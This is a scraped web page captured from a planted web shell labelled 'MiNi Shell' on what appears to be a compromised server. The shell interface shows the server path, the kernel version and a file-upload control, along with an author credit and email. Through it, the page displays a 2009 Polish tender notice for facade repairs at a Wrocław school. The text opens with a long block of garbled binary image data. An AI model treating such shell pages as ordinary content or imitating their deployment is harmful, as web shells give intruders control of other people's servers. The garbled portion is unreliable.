JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090331/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090331/56455-N-2009.html

<p class="kh_header"><b>Wrocław: Remont elewacji frontowej i północnej wraz z modernizacją zewnętrznych instalacji elektrycznych w Zespole Szkół Ogólnokształcących Nr 3 przy ul. Ks. Piotra Skargi 29-31 we Wrocławiu</b><br>
<b>Numer ogłoszenia: 56455 - 2009; data zamieszczenia: 31.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Obsługi Jednostek Miejskich , ul. G. Zapolskiej 2/4, 50-032 Wrocław, woj. dolnośląskie, tel. 071 7777865, faks 071 7777724.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wroclaw.pl/zojm/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont elewacji frontowej i północnej wraz z modernizacją zewnętrznych instalacji elektrycznych w Zespole Szkół Ogólnokształcących Nr 3 przy ul. Ks. Piotra Skargi 29-31 we Wrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PRZEDMIOT ZAMÓWIENIA:

1.	Przedmiotem zamówienia jest kompleksowy remont elewacji frontowej i północnej budynku głównego ZSO Nr 3 zgodnie z zakresem określonym w dokumentacji projektowej jako etap I i III, modernizacja zewnętrznych instalacji elektrycznych, organizacja ruchu zastępczego wraz z odbudową nawierzchni, obsługa placu budowy.  

2.	Zakres rzeczowy zamówienia  obejmuje w szczególności:

1)	Wymiana  rynien i rur spustowych, udrożnienie i ewentualna wymiana fragmentów kanalizacji deszczowej w przypadku stwierdzenia jej złego stanu technicznego.
2)	Kompleksowa renowacja elewacji z cegły  polegająca na uzupełnieniu ubytków, odtworzeniu detali architektonicznych i zdobniczych, czyszczeniu elewacji i zabezpieczeniu środkami hydrofobowymi antygraffiti.
3)	Czyszczenie i uzupełnienie elementów granitowych.
4)	Uzupełnienie i oczyszczenie obudów studzienek piwnicznych z granitu.
5)	Renowacja stolarki drzwiowej i wymiana drzwi w elewacji północnej.
6)	Wymiana, uzupełnienia oraz konserwacja elementów stalowych: kraty, balustrady, okucia, siatki wentylacyjne.
7)	Montaż relingów do podtrzymywania donic z kwiatami.
8)	Docieplenie  części elewacji północnej.
9)	Wymiana tynków zewnętrznych wg dokumentacji projektowej..
10)	 Izolacja ścian piwnic docieplanej części elewacji północnej.
11)	Wymiana części instalacji odgromowej.
12)	Likwidacja okablowania na elewacjach oraz modernizacja  instalacji oświetlenia zewnętrznego - dotyczy wszystkich elewacji.
13)	Roboty ziemne, wykopy.
14)	Odtworzenie kamiennej nawierzchni chodnika w przypadku wymiany kanalizacji deszczowej..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.44.20.00-7, 45.45.30.00-7, 45.10.00.00-8, 45.31.00.00-3, 45.32.00.00-6, 45.45.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 154.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 30000<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone w przepisie art.22 ust.1  Pzp:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia;
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy ponadto: 
1)	dysponują lub będą dysponować osobami zdolnymi do realizacji zamówienia,  tzn.: 
a)	kierownikiem budowy który posiada uprawnienia do kierowania robotami budowlanymi 
w zakresie zgodnym z przedmiotem zamówienia w specjalności  konstrukcyjno - budowlanej, oraz min. dwuletnią udokumentowaną praktykę w prowadzeniu robót na obiektach zabytkowych
b)	branżowym kierownikiem robót który posiada uprawnienia do kierowania robotami budowlanymi w zakresie zgodnym z przedmiotem zamówienia w specjalności instalacji elektrycznych.
Wymagane jest, by w/w osoby były członkami właściwej izby samorządu zawodowego.
2)	posiadają niezbędną wiedzą i doświadczenie, tzn.: w okresie ostatnich pięciu lat zrealizowali minimum 3 zamówienia (w tym jedno zrealizowane  zamówienie na obiekcie wpisanym do rejestru zabytków lub objętym nadzorem konserwatorskim) obejmujące roboty w zakresie odpowiadającym swoim rodzajem i wielkością robotom stanowiącym przedmiot zamówienia. Wykazane roboty budowlane muszą być poparte dokumentami wystawionymi przez Inwestora potwierdzającymi, że zostały wykonane  należycie. Wykonawca przedstawi opisem rodzaj robót, poda ich wartości, wielkości oraz daty i miejsca wykonania.
3)	posiadają ubezpieczenie od odpowiedzialności cywilnej (OC) w zakresie swojej działalności na kwotę co najmniej 1.000.000,00 zł.
4)	udzielą minimum 60 miesięcznej gwarancji na wykonanie robót objętych przedmiotem zamówienia licząc od dnia wykonania zamówienia i uznania go przez zamawiającego za należycie wykonane.
5)	Wniosą wadium w wysokości i na zasadach opisanych w rozdziale VIII SIWZ.
6)	W przypadku wspólnego ubiegania się o udzielnie zamówienia (art. 23 Pzp), wykonawcy:
a)	  ustanowią pełnomocnika,
b)	  każdy z wykonawców oddzielnie musi spełniać wymóg zawarty w ust. 1 pkt. 4.            
  i udokumentować, że  nie podlega wykluczeniu na podstawie art. 24 Pzp,
c)	  wymogi zawarte w ust.1 pkt. 1-3 oraz w ust. 2 wykonawcy mogą spełniać łącznie.
3.	Wykluczeniu z postępowania podlegają wykonawcy w przypadkach określonych w art. 24 Pzp.
4.	Ocena spełniania powyższych warunków dokonywana będzie w oparciu o złożoną ofertę i załączniki do niej wg zasady spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.		Formularz oferty - podpisany na każdej stronie  
2.		Oświadczenie wykonawcy w sprawie ubiegania się o zamówienie publiczne 
3.		Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert  
4.		Aktualne  zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego 
oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia 
Społecznego potwierdzających odpowiednio,  że wykonawca nie zalega z opłacaniem 
podatków, opat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że 
uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych 
płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
5.		Wykaz osób którymi dysponuje lub będzie dysponował wykonawca oraz wskazanie osób pełniących funkcje: kierownika budowy  wraz z ,opisem dwuletniej udokumentowanej praktyki w prowadzeniu robót na obiektach zabytkowych deklarowanego kierownika budowy, branżowych kierowników robót (jeżeli przewiduje SIWZ) 
6.		Uprawnienia budowlane w/w osób zgodne z zakresem przedmiotu zamówienia 
7.		Aktualne zaświadczenia z Izby Inżynierów Budownictwa o przynależności do Izby osób pełniących samodzielne funkcje w budownictwie. ( j.w.)
8.		Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym 
stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania (w tym jedno zrealizowane  zamówienie na obiekcie wpisanym do rejestru zabytków lub objętym nadzorem konserwatorskim) wraz z załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie. 9.		Wykaz dokumentów potwierdzających, że roboty  zostały wykonane z należytą starannością  10.		Polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest 
ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
11.		Oświadczenie Wykonawcy o kontynuacji ubezpieczenia OC przez okres realizacji robót          
12.		Dowód wniesienia wadium.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wroclaw.pl/zojm/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Obsługi Jednostek Miejskich
ul. Gabrieli Zapolskiej 2/4 pokój nr 326, 50-032 Wrocław.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2009 godzina 09:30, miejsce: Zarząd Obsługi Jednostek Miejskich
ul. Gabrieli Zapolskiej 2/4 pokój nr 303, 50-032 Wrocław.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com